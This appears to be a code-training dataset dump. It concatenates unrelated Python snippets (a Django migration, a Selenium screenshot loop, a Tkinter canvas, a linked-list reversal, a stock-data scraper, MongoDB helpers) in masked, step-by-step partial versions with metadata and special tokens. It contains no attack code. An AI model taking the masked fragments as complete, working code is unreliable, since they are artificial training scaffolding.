<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-17 14:47
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('votes', '0003_choice_votes'),
]
operations = [
migrations.CreateModel(
name='Token',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('token', models.CharField(editable=False, max_length=6)),
('used', models.BooleanField(default=False, editable=False)),
],
),
migrations.AlterField(
model_name='choice',
name='votes',
field=models.IntegerField(default=0, editable=False),
),
]
|
flexible
|
{
"blob_id": "781cb59fb9b6d22547fd4acf895457868342e125",
"index": 8290,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('votes', '0003_choice_votes')]\n operations = [migrations.CreateModel(name='Token', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('token', models.CharField(editable=\n False, max_length=6)), ('used', models.BooleanField(default=False,\n editable=False))]), migrations.AlterField(model_name='choice', name\n ='votes', field=models.IntegerField(default=0, editable=False))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('votes', '0003_choice_votes')]\n operations = [migrations.CreateModel(name='Token', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('token', models.CharField(editable=\n False, max_length=6)), ('used', models.BooleanField(default=False,\n editable=False))]), migrations.AlterField(model_name='choice', name\n ='votes', field=models.IntegerField(default=0, editable=False))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.3 on 2016-11-17 14:47\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('votes', '0003_choice_votes'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Token',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('token', models.CharField(editable=False, max_length=6)),\n ('used', models.BooleanField(default=False, editable=False)),\n ],\n ),\n migrations.AlterField(\n model_name='choice',\n name='votes',\n field=models.IntegerField(default=0, editable=False),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
driver.get(
'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'
)
start = 'C://Users//Pathak//Downloads//chromedriver_win32'
df = str(counter)
gh = str(time.time())
ft = df + gh + '.png'
final = os.path.join(start, ft)
driver.get_screenshot_as_file(final)
counter += 1
sleep(20)
driver.quit()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
driver = webdriver.Chrome(executable_path=
'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')
counter = 0
while True:
driver.get(
'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'
)
start = 'C://Users//Pathak//Downloads//chromedriver_win32'
df = str(counter)
gh = str(time.time())
ft = df + gh + '.png'
final = os.path.join(start, ft)
driver.get_screenshot_as_file(final)
counter += 1
sleep(20)
driver.quit()
<|reserved_special_token_1|>
from selenium import webdriver
from time import sleep
import os.path
import time
import datetime
driver = webdriver.Chrome(executable_path=
'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')
counter = 0
while True:
driver.get(
'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'
)
start = 'C://Users//Pathak//Downloads//chromedriver_win32'
df = str(counter)
gh = str(time.time())
ft = df + gh + '.png'
final = os.path.join(start, ft)
driver.get_screenshot_as_file(final)
counter += 1
sleep(20)
driver.quit()
<|reserved_special_token_1|>
from selenium import webdriver
from time import sleep
import os.path
import time
import datetime
driver =webdriver.Chrome(executable_path=r'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')
counter=0
while True :
driver.get("https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0")
start='C://Users//Pathak//Downloads//chromedriver_win32'
df=str(counter);
gh=str(time.time())
ft=df+gh+'.png'
final=os.path.join(start,ft)
driver.get_screenshot_as_file(final)
counter+=1
sleep(20)
driver.quit()
|
flexible
|
{
"blob_id": "30e7fc169eceb3d8cc1a4fa6bb65d81a4403f2c7",
"index": 5800,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n driver.get(\n 'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'\n )\n start = 'C://Users//Pathak//Downloads//chromedriver_win32'\n df = str(counter)\n gh = str(time.time())\n ft = df + gh + '.png'\n final = os.path.join(start, ft)\n driver.get_screenshot_as_file(final)\n counter += 1\n sleep(20)\ndriver.quit()\n",
"step-3": "<mask token>\ndriver = webdriver.Chrome(executable_path=\n 'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')\ncounter = 0\nwhile True:\n driver.get(\n 'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'\n )\n start = 'C://Users//Pathak//Downloads//chromedriver_win32'\n df = str(counter)\n gh = str(time.time())\n ft = df + gh + '.png'\n final = os.path.join(start, ft)\n driver.get_screenshot_as_file(final)\n counter += 1\n sleep(20)\ndriver.quit()\n",
"step-4": "from selenium import webdriver\nfrom time import sleep\nimport os.path\nimport time\nimport datetime\ndriver = webdriver.Chrome(executable_path=\n 'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')\ncounter = 0\nwhile True:\n driver.get(\n 'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'\n )\n start = 'C://Users//Pathak//Downloads//chromedriver_win32'\n df = str(counter)\n gh = str(time.time())\n ft = df + gh + '.png'\n final = os.path.join(start, ft)\n driver.get_screenshot_as_file(final)\n counter += 1\n sleep(20)\ndriver.quit()\n",
"step-5": "from selenium import webdriver\r\nfrom time import sleep\r\nimport os.path\r\nimport time\r\nimport datetime\r\ndriver =webdriver.Chrome(executable_path=r'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')\r\ncounter=0\r\nwhile True :\r\n\t\r\n\r\n\tdriver.get(\"https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0\")\r\n\tstart='C://Users//Pathak//Downloads//chromedriver_win32'\r\n\tdf=str(counter);\r\n\tgh=str(time.time())\r\n\r\n\tft=df+gh+'.png'\r\n\tfinal=os.path.join(start,ft)\r\n\tdriver.get_screenshot_as_file(final) \r\n\tcounter+=1\r\n\t\r\n\tsleep(20)\r\n\r\ndriver.quit()\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
from Tkinter import *
root = Tk()
root.title("Simple Graph")
root.resizable(0,0)
points = []
spline = 0
tag1 = "theline"
def point(event):
c.create_oval(event.x, event.y, event.x+1, event.y+1, fill="black", width="10.0")
points.append(event.x)
points.append(event.y)
print(event.x)
print(event.y)
return points
def canxy(event):
print("Getting the coordinates")
print event.x, event.y
c.create_oval(event.x, event.y, event.x+1, event.y+1, fill="red", width="20.0")
def graph(event):
global theline
c.create_line(points, tags="theline")
def toggle(event):
global spline
if spline == 0:
c.itemconfigure(tag1, smooth=1)
spline = 1
elif spline == 1:
c.itemconfigure(tag1, smooth=0)
spline = 0
return spline
c = Canvas(root, bg="white", width=300, height= 300)
c.configure(cursor="crosshair")
c.pack()
c.bind("<Button-1>", point)
#c.bind("<Button-3>", graph)
c.bind("<Button-3>", canxy)
#c.bind("<Button-2>", toggle)
root.mainloop()
|
normal
|
{
"blob_id": "d88485e37d4df4cb0c8d79124d4c9c9ba18d124e",
"index": 9074,
"step-1": "#!/usr/bin/python\nfrom Tkinter import *\n\nroot = Tk()\n\nroot.title(\"Simple Graph\")\n\nroot.resizable(0,0)\n\npoints = []\n\nspline = 0\n\ntag1 = \"theline\"\n\ndef point(event):\n\tc.create_oval(event.x, event.y, event.x+1, event.y+1, fill=\"black\", width=\"10.0\")\n\tpoints.append(event.x)\n\tpoints.append(event.y)\n\tprint(event.x)\n\tprint(event.y)\n\treturn points\n\ndef canxy(event):\n\tprint(\"Getting the coordinates\")\n\tprint event.x, event.y\n\tc.create_oval(event.x, event.y, event.x+1, event.y+1, fill=\"red\", width=\"20.0\")\n\ndef graph(event):\n\tglobal theline\n\tc.create_line(points, tags=\"theline\")\n\t\n\ndef toggle(event):\n\tglobal spline\n\tif spline == 0:\n\t\tc.itemconfigure(tag1, smooth=1)\n\t\tspline = 1\n\telif spline == 1:\n\t\tc.itemconfigure(tag1, smooth=0)\n\t\tspline = 0\n\treturn spline\n\n\nc = Canvas(root, bg=\"white\", width=300, height= 300)\n\nc.configure(cursor=\"crosshair\")\n\nc.pack()\n\nc.bind(\"<Button-1>\", point)\n\n#c.bind(\"<Button-3>\", graph)\nc.bind(\"<Button-3>\", canxy)\n#c.bind(\"<Button-2>\", toggle)\n\nroot.mainloop()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
class Node():
def __init__(self, value):
self.value = value
self.next = None
def linked_list_from_array(arr):
head = Node(arr[0])
cur = head
for i in range(1, len(arr)):
cur.next = Node(arr[i])
cur = cur.next
return head
def array_from_linked_list(head):
arr = []
cur = head
while cur:
arr.append(cur.value)
cur = cur.next
return arr
def reverse_linked_list(head):
prev = None
cur = head
while cur:
next = cur.next # save
cur.next = prev # assign next to prev
prev = cur
cur = next
return prev
array = [9, 1, 2, 3, 6, 8, 11, 5]
ll = linked_list_from_array(array)
rev_ll = reverse_linked_list(ll)
rev_array = array_from_linked_list(rev_ll)
print(array)
print(rev_array)
def reverse_linked_list_section(head, start, end):
pass
# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
# (0, 3) => [3, 2, 1, 0, 4, 5, 6, 7, 8, 9]
# (2, 4) => [0, 1, 4, 3, 2, 5, 6, 7, 8, 9]
# (6, 9) => [0, 1, 2, 3, 4, 5, 9, 8, 7, 6]
|
normal
|
{
"blob_id": "e1eb86480fa4eadabf05f10cc54ff9daa790438c",
"index": 3935,
"step-1": "class Node:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\n<mask token>\n\n\ndef array_from_linked_list(head):\n arr = []\n cur = head\n while cur:\n arr.append(cur.value)\n cur = cur.next\n return arr\n\n\n<mask token>\n",
"step-2": "class Node:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\ndef linked_list_from_array(arr):\n head = Node(arr[0])\n cur = head\n for i in range(1, len(arr)):\n cur.next = Node(arr[i])\n cur = cur.next\n return head\n\n\ndef array_from_linked_list(head):\n arr = []\n cur = head\n while cur:\n arr.append(cur.value)\n cur = cur.next\n return arr\n\n\ndef reverse_linked_list(head):\n prev = None\n cur = head\n while cur:\n next = cur.next\n cur.next = prev\n prev = cur\n cur = next\n return prev\n\n\n<mask token>\n",
"step-3": "class Node:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\ndef linked_list_from_array(arr):\n head = Node(arr[0])\n cur = head\n for i in range(1, len(arr)):\n cur.next = Node(arr[i])\n cur = cur.next\n return head\n\n\ndef array_from_linked_list(head):\n arr = []\n cur = head\n while cur:\n arr.append(cur.value)\n cur = cur.next\n return arr\n\n\ndef reverse_linked_list(head):\n prev = None\n cur = head\n while cur:\n next = cur.next\n cur.next = prev\n prev = cur\n cur = next\n return prev\n\n\n<mask token>\nprint(array)\nprint(rev_array)\n\n\ndef reverse_linked_list_section(head, start, end):\n pass\n",
"step-4": "class Node:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\ndef linked_list_from_array(arr):\n head = Node(arr[0])\n cur = head\n for i in range(1, len(arr)):\n cur.next = Node(arr[i])\n cur = cur.next\n return head\n\n\ndef array_from_linked_list(head):\n arr = []\n cur = head\n while cur:\n arr.append(cur.value)\n cur = cur.next\n return arr\n\n\ndef reverse_linked_list(head):\n prev = None\n cur = head\n while cur:\n next = cur.next\n cur.next = prev\n prev = cur\n cur = next\n return prev\n\n\narray = [9, 1, 2, 3, 6, 8, 11, 5]\nll = linked_list_from_array(array)\nrev_ll = reverse_linked_list(ll)\nrev_array = array_from_linked_list(rev_ll)\nprint(array)\nprint(rev_array)\n\n\ndef reverse_linked_list_section(head, start, end):\n pass\n",
"step-5": "class Node():\n def __init__(self, value):\n self.value = value\n self.next = None\n\ndef linked_list_from_array(arr):\n head = Node(arr[0])\n cur = head\n \n for i in range(1, len(arr)):\n cur.next = Node(arr[i])\n cur = cur.next\n \n return head\n\ndef array_from_linked_list(head):\n arr = []\n cur = head\n\n while cur:\n arr.append(cur.value)\n cur = cur.next\n\n return arr\n\ndef reverse_linked_list(head):\n prev = None\n cur = head\n\n while cur:\n next = cur.next # save\n cur.next = prev # assign next to prev\n prev = cur\n cur = next\n\n return prev\n\narray = [9, 1, 2, 3, 6, 8, 11, 5]\nll = linked_list_from_array(array)\nrev_ll = reverse_linked_list(ll)\nrev_array = array_from_linked_list(rev_ll)\n\nprint(array)\nprint(rev_array)\n\ndef reverse_linked_list_section(head, start, end):\n pass\n\n# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n# (0, 3) => [3, 2, 1, 0, 4, 5, 6, 7, 8, 9]\n# (2, 4) => [0, 1, 4, 3, 2, 5, 6, 7, 8, 9]\n# (6, 9) => [0, 1, 2, 3, 4, 5, 9, 8, 7, 6]\n\n",
"step-ids": [
3,
5,
7,
8,
9
]
}
|
[
3,
5,
7,
8,
9
] |
<|reserved_special_token_0|>
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return csv_reader[-1]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_last_element_timestamp(url):
conn = urllib2.urlopen(url)
html = conn.read()
soup = BeautifulSoup(html, 'lxml')
elements = soup.find_all('div')[-1]
return elements.text
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return csv_reader[-1]
for page, url_value in url.items():
print(page, get_last_element_timestamp(url_value))
<|reserved_special_token_0|>
print('Historic csv infosys => BSE')
print(historic_data(bse_info_csv))
print('Historic csv of infosys => NSE')
print(historic_data(nse_info_csv))
print('Historic csv of sensex ')
print(historic_data(historic_sensex))
print('Historic csv of nifty')
print(historic_data(historic_nifty))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
url = {'Home ': 'https://www.moneycontrol.com/'}
def get_last_element_timestamp(url):
conn = urllib2.urlopen(url)
html = conn.read()
soup = BeautifulSoup(html, 'lxml')
elements = soup.find_all('div')[-1]
return elements.text
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return csv_reader[-1]
for page, url_value in url.items():
print(page, get_last_element_timestamp(url_value))
bse_info_csv = 'http://www.moneycontrol.com/tech_charts/bse/his/it.csv'
nse_info_csv = 'http://www.moneycontrol.com/tech_charts/nse/his/it.csv'
historic_sensex = 'http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv'
historic_nifty = 'http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv'
print('Historic csv infosys => BSE')
print(historic_data(bse_info_csv))
print('Historic csv of infosys => NSE')
print(historic_data(nse_info_csv))
print('Historic csv of sensex ')
print(historic_data(historic_sensex))
print('Historic csv of nifty')
print(historic_data(historic_nifty))
<|reserved_special_token_1|>
import urllib2
import csv
from bs4 import BeautifulSoup
url = {'Home ': 'https://www.moneycontrol.com/'}
def get_last_element_timestamp(url):
conn = urllib2.urlopen(url)
html = conn.read()
soup = BeautifulSoup(html, 'lxml')
elements = soup.find_all('div')[-1]
return elements.text
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return csv_reader[-1]
for page, url_value in url.items():
print(page, get_last_element_timestamp(url_value))
bse_info_csv = 'http://www.moneycontrol.com/tech_charts/bse/his/it.csv'
nse_info_csv = 'http://www.moneycontrol.com/tech_charts/nse/his/it.csv'
historic_sensex = 'http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv'
historic_nifty = 'http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv'
print('Historic csv infosys => BSE')
print(historic_data(bse_info_csv))
print('Historic csv of infosys => NSE')
print(historic_data(nse_info_csv))
print('Historic csv of sensex ')
print(historic_data(historic_sensex))
print('Historic csv of nifty')
print(historic_data(historic_nifty))
<|reserved_special_token_1|>
import urllib2
import csv
from bs4 import BeautifulSoup
url = {
"Home ": 'https://www.moneycontrol.com/',
# "Market": 'https://www.moneycontrol.com/stocksmarketsindia/',
# "Mf Home": 'https://www.moneycontrol.com/mutualfundindia/'
}
def get_last_element_timestamp(url):
conn = urllib2.urlopen(url)
html = conn.read()
soup = BeautifulSoup(html,"lxml")
elements = soup.find_all('div')[-1]
return elements.text
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return (csv_reader[-1])
for page,url_value in url.items():
print (page,get_last_element_timestamp(url_value))
# print page
##
bse_info_csv="http://www.moneycontrol.com/tech_charts/bse/his/it.csv"
nse_info_csv = "http://www.moneycontrol.com/tech_charts/nse/his/it.csv"
historic_sensex = "http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv"
historic_nifty = "http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv"
print("Historic csv infosys => BSE")
print(historic_data(bse_info_csv))
print ("Historic csv of infosys => NSE")
print(historic_data(nse_info_csv))
print ("Historic csv of sensex ")
print(historic_data(historic_sensex))
print ("Historic csv of nifty")
print (historic_data(historic_nifty))
|
flexible
|
{
"blob_id": "81f75498afcca31e38ea7856c81c291af3ef6673",
"index": 7151,
"step-1": "<mask token>\n\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return csv_reader[-1]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_last_element_timestamp(url):\n conn = urllib2.urlopen(url)\n html = conn.read()\n soup = BeautifulSoup(html, 'lxml')\n elements = soup.find_all('div')[-1]\n return elements.text\n\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return csv_reader[-1]\n\n\nfor page, url_value in url.items():\n print(page, get_last_element_timestamp(url_value))\n<mask token>\nprint('Historic csv infosys => BSE')\nprint(historic_data(bse_info_csv))\nprint('Historic csv of infosys => NSE')\nprint(historic_data(nse_info_csv))\nprint('Historic csv of sensex ')\nprint(historic_data(historic_sensex))\nprint('Historic csv of nifty')\nprint(historic_data(historic_nifty))\n",
"step-3": "<mask token>\nurl = {'Home ': 'https://www.moneycontrol.com/'}\n\n\ndef get_last_element_timestamp(url):\n conn = urllib2.urlopen(url)\n html = conn.read()\n soup = BeautifulSoup(html, 'lxml')\n elements = soup.find_all('div')[-1]\n return elements.text\n\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return csv_reader[-1]\n\n\nfor page, url_value in url.items():\n print(page, get_last_element_timestamp(url_value))\nbse_info_csv = 'http://www.moneycontrol.com/tech_charts/bse/his/it.csv'\nnse_info_csv = 'http://www.moneycontrol.com/tech_charts/nse/his/it.csv'\nhistoric_sensex = 'http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv'\nhistoric_nifty = 'http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv'\nprint('Historic csv infosys => BSE')\nprint(historic_data(bse_info_csv))\nprint('Historic csv of infosys => NSE')\nprint(historic_data(nse_info_csv))\nprint('Historic csv of sensex ')\nprint(historic_data(historic_sensex))\nprint('Historic csv of nifty')\nprint(historic_data(historic_nifty))\n",
"step-4": "import urllib2\nimport csv\nfrom bs4 import BeautifulSoup\nurl = {'Home ': 'https://www.moneycontrol.com/'}\n\n\ndef get_last_element_timestamp(url):\n conn = urllib2.urlopen(url)\n html = conn.read()\n soup = BeautifulSoup(html, 'lxml')\n elements = soup.find_all('div')[-1]\n return elements.text\n\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return csv_reader[-1]\n\n\nfor page, url_value in url.items():\n print(page, get_last_element_timestamp(url_value))\nbse_info_csv = 'http://www.moneycontrol.com/tech_charts/bse/his/it.csv'\nnse_info_csv = 'http://www.moneycontrol.com/tech_charts/nse/his/it.csv'\nhistoric_sensex = 'http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv'\nhistoric_nifty = 'http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv'\nprint('Historic csv infosys => BSE')\nprint(historic_data(bse_info_csv))\nprint('Historic csv of infosys => NSE')\nprint(historic_data(nse_info_csv))\nprint('Historic csv of sensex ')\nprint(historic_data(historic_sensex))\nprint('Historic csv of nifty')\nprint(historic_data(historic_nifty))\n",
"step-5": "import urllib2\nimport csv\nfrom bs4 import BeautifulSoup\nurl = {\n \"Home \": 'https://www.moneycontrol.com/',\n# \"Market\": 'https://www.moneycontrol.com/stocksmarketsindia/',\n# \"Mf Home\": 'https://www.moneycontrol.com/mutualfundindia/'\n}\ndef get_last_element_timestamp(url):\n conn = urllib2.urlopen(url)\n html = conn.read()\n soup = BeautifulSoup(html,\"lxml\")\n elements = soup.find_all('div')[-1]\n return elements.text\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return (csv_reader[-1])\n\nfor page,url_value in url.items():\n print (page,get_last_element_timestamp(url_value))\n# print page\n##\nbse_info_csv=\"http://www.moneycontrol.com/tech_charts/bse/his/it.csv\"\nnse_info_csv = \"http://www.moneycontrol.com/tech_charts/nse/his/it.csv\"\nhistoric_sensex = \"http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv\"\nhistoric_nifty = \"http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv\"\nprint(\"Historic csv infosys => BSE\")\nprint(historic_data(bse_info_csv))\nprint (\"Historic csv of infosys => NSE\")\nprint(historic_data(nse_info_csv)) \nprint (\"Historic csv of sensex \")\nprint(historic_data(historic_sensex))\nprint (\"Historic csv of nifty\")\nprint (historic_data(historic_nifty)) \n\n\n\n\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
class Point:
<|reserved_special_token_0|>
def __str__(self):
return '({0},{1})'.format(self.x, self.y)
def __add__(self, other):
self.x = self.x + other.x
self.y = self.y + other.y
return Point(self.x, self.y)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return '({0},{1})'.format(self.x, self.y)
def __add__(self, other):
self.x = self.x + other.x
self.y = self.y + other.y
return Point(self.x, self.y)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return '({0},{1})'.format(self.x, self.y)
def __add__(self, other):
self.x = self.x + other.x
self.y = self.y + other.y
return Point(self.x, self.y)
<|reserved_special_token_0|>
print(p1)
print(p2)
<|reserved_special_token_0|>
print(p3)
<|reserved_special_token_1|>
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return '({0},{1})'.format(self.x, self.y)
def __add__(self, other):
self.x = self.x + other.x
self.y = self.y + other.y
return Point(self.x, self.y)
p1 = Point(1, 2)
p2 = Point(3, 4)
print(p1)
print(p2)
p3 = p1 + p2
print(p3)
<|reserved_special_token_1|>
class Point:
def __init__(self,x,y):
self.x=x
self.y=y
def __str__(self):
return "({0},{1})".format(self.x,self.y)
def __add__(self, other):
self.x=self.x+other.x
self.y=self.y+other.y
return Point(self.x,self.y)
p1=Point(1,2)
p2=Point(3,4)
print(p1)
print(p2)
p3=p1+p2
print(p3)
|
flexible
|
{
"blob_id": "1bebd3c18742f5362d2e5f22c539f6b13ad58d2a",
"index": 2873,
"step-1": "class Point:\n <mask token>\n\n def __str__(self):\n return '({0},{1})'.format(self.x, self.y)\n\n def __add__(self, other):\n self.x = self.x + other.x\n self.y = self.y + other.y\n return Point(self.x, self.y)\n\n\n<mask token>\n",
"step-2": "class Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return '({0},{1})'.format(self.x, self.y)\n\n def __add__(self, other):\n self.x = self.x + other.x\n self.y = self.y + other.y\n return Point(self.x, self.y)\n\n\n<mask token>\n",
"step-3": "class Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return '({0},{1})'.format(self.x, self.y)\n\n def __add__(self, other):\n self.x = self.x + other.x\n self.y = self.y + other.y\n return Point(self.x, self.y)\n\n\n<mask token>\nprint(p1)\nprint(p2)\n<mask token>\nprint(p3)\n",
"step-4": "class Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return '({0},{1})'.format(self.x, self.y)\n\n def __add__(self, other):\n self.x = self.x + other.x\n self.y = self.y + other.y\n return Point(self.x, self.y)\n\n\np1 = Point(1, 2)\np2 = Point(3, 4)\nprint(p1)\nprint(p2)\np3 = p1 + p2\nprint(p3)\n",
"step-5": "class Point:\r\n def __init__(self,x,y):\r\n self.x=x\r\n self.y=y\r\n\r\n def __str__(self):\r\n return \"({0},{1})\".format(self.x,self.y)\r\n\r\n def __add__(self, other):\r\n self.x=self.x+other.x\r\n self.y=self.y+other.y\r\n return Point(self.x,self.y)\r\n\r\np1=Point(1,2)\r\np2=Point(3,4)\r\nprint(p1)\r\nprint(p2)\r\np3=p1+p2\r\nprint(p3)\r\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from pymongo import MongoClient
import Config
DB = Config.DB
COLLECTION = Config.COLLECTION
def connectMongo():
uri = "mongodb://localhost"
client = MongoClient(uri)
return client[DB]
def connectMongoCollection(collection = COLLECTION):
uri = "mongodb://localhost"
client = MongoClient(uri)
db = client[DB]
return db[collection]
|
normal
|
{
"blob_id": "7a5106456d0fdd905829c5aa1f4a69b027f3a04c",
"index": 4198,
"step-1": "<mask token>\n\n\ndef connectMongoCollection(collection=COLLECTION):\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n db = client[DB]\n return db[collection]\n",
"step-2": "<mask token>\n\n\ndef connectMongo():\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n return client[DB]\n\n\ndef connectMongoCollection(collection=COLLECTION):\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n db = client[DB]\n return db[collection]\n",
"step-3": "<mask token>\nDB = Config.DB\nCOLLECTION = Config.COLLECTION\n\n\ndef connectMongo():\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n return client[DB]\n\n\ndef connectMongoCollection(collection=COLLECTION):\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n db = client[DB]\n return db[collection]\n",
"step-4": "from pymongo import MongoClient\nimport Config\nDB = Config.DB\nCOLLECTION = Config.COLLECTION\n\n\ndef connectMongo():\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n return client[DB]\n\n\ndef connectMongoCollection(collection=COLLECTION):\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n db = client[DB]\n return db[collection]\n",
"step-5": "from pymongo import MongoClient\nimport Config\n\nDB = Config.DB\nCOLLECTION = Config.COLLECTION\n\n\ndef connectMongo():\n\turi = \"mongodb://localhost\"\n\tclient = MongoClient(uri)\n\treturn client[DB]\n\ndef connectMongoCollection(collection = COLLECTION):\n\turi = \"mongodb://localhost\"\n\tclient = MongoClient(uri)\n\tdb = client[DB]\n\treturn db[collection]\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import numpy as np
def SO3_to_R3(x_skew):
x = np.zeros((3, 1))
x[0, 0] = -1 * x_skew[1, 2]
x[1, 0] = x_skew[0, 2]
x[2, 0] = -1 * x_skew[0, 1]
return x
|
normal
|
{
"blob_id": "97bff6eb0cd16c915180cb634e6bf30e17adfdef",
"index": 2080,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef SO3_to_R3(x_skew):\n x = np.zeros((3, 1))\n x[0, 0] = -1 * x_skew[1, 2]\n x[1, 0] = x_skew[0, 2]\n x[2, 0] = -1 * x_skew[0, 1]\n return x\n",
"step-3": "import numpy as np\n\n\ndef SO3_to_R3(x_skew):\n x = np.zeros((3, 1))\n x[0, 0] = -1 * x_skew[1, 2]\n x[1, 0] = x_skew[0, 2]\n x[2, 0] = -1 * x_skew[0, 1]\n return x\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class JamfScriptUploader(JamfUploaderBase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class JamfScriptUploader(JamfUploaderBase):
description = (
'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'
)
input_variables = {'JSS_URL': {'required': True, 'description':
'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'
}, 'API_USERNAME': {'required': True, 'description':
